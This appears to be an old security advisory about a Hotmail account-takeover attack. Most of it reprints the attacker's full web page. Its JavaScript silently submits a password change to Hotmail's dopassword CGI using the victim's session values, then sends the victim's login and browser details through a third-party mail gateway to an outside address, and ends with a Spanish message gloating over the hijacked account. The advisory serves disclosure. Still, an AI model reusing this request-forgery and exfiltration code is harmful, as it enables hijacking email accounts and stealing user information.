COMMAND
Hotmail
SYSTEMS AFFECTED
Hotmail users
PROBLEM
David L. Nicol posted following. It's exploit for Hotmail which
should be fixed now. If Hotmail merely changed the names of
variables, or did a similar short term fix, the next expolit might
not be nice enough to announce itself as such. Modifying the El
Lite exploit to only work if it had a particular hotmail account
might be a piece of cake; allowing for some highly targeted kinds
of attacks. (esp. if a hotmail user is doing anything involving
return-email verification, like tipjar or first virtual.)
Here is the hacker's tripod page, including the exploit that takes
advantage of the trust hotmail has for instructions from your
browser, by secretly sending instructions to hotmail to change
your password to
<HTML>
<kraffa2="<HEAD>
<!--Begin JavaScrypt roadmap code. If editing downloaded HTML source,
delete
this portion.-->
<scrypt language="JavaScrypt">
<!--
function TripodShowPopup()
{
// open the popup window
var popupURL = "http://members.tripod.com/adm/popup/roadmap.shtml";
var popup =
window.open(popupURL,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105');
// set the opener if it's not already set. it's set automatically
// in netscape 3.0+ and ie 3.0+.
if( navigator.appName.substring(0,8) == "Netscape" )
{
popup.location = popupURL;
}
}
TripodShowPopup();
// -->
</scrypt>
<!--End inserted JavaScript code.-->
<base href="http://members.tripod.com/kraffa2/Hook.html">
</HEAD>
<body>
<scrypt>
<!--
function getCGIValue(nombre, elURL)
{
elURL= elURL;
nombre= nombre+"=";
vacio="";
found= elURL.indexOf(nombre);
if (found > -1)
{
found2= elURL.indexOf("&",found);
found+= nombre.length;
end= (found2 > -1) ? found2 : elURL.length;
var value= elURL.substring(found, end);
value= (value != null) ? value : vacio;
return value;
}
else {return vacio;}
}
Query= unescape(self.location.search);
disk= getCGIValue("disk", Query);
login= getCGIValue("login", Query);
host= "www.hotmail.com";
hintq= escape('<img
src="http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by El
Lite©</center>');
hinta= '%66axf%61x';
TheURL=
"http://
"+host+"/cgi-bin/dopassword?"+"disk="+disk+"&login="+login+"&f=34145&curmbox=ACTIVE&_lang=&np=yes&new_%70%61%73s%77d=%6B%6B%6A%6A01&new_%70%61%73s%77d2=kk%6A%6A01&hi%6E%74q="+hintq+"&hinta="+hinta;
Mail=
"http://www.tipjar.com/cgi-bin/generic?mailto=paulinaporizkova@hotmail.com&mailfrom=
"+login+"@hotmail.com&subject="+login+"+HMpass+cambiada+%0A%0ASu+navegador+es+"+escape(navigator.userAgent+"\n.\n");
options=
'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105';
HOTMAIL= window.open(TheURL,"HOTMAIL",options);
self.focus();
setTimeout("HOTMAIL.close()",8000);
MAIL= window.open(Mail,"MAIL",options);
self.focus();
setTimeout("MAIL.close()",8000);
//-->
</scrypt>
<pre><b>
Uno de los mejores correos gratis que existen es precisamente el que
tu estás usando, hotmail. Su seguridad e inviolabilidad son ya
legendarias.
Tanto es así que mira por donde a partir de este mismísimo momento las
cosas van a tomar otro cariz. Quiero decir que lamentándolo mucho tu
dirección de hotmail ha sido inutilizada, o mejor dicho, secuestrada
por mi.
Ya nunca mas podrás entrar en ella.
Así de definitivo. Ahora es
SOLO MIAAA!!!! :-))))
Como soy un buenazo y no eres mi única víctima pues un dia de estos
voy a publicar en es.comp.hackers la password que os puse (es la misma
para todos vosotros pardillos)
Hala, que te sea leve
El Lite©
</b></pre>
</body>
</html>
</FONT>
SOLUTION
Hotmail claims not to be vulnerable to this anymore.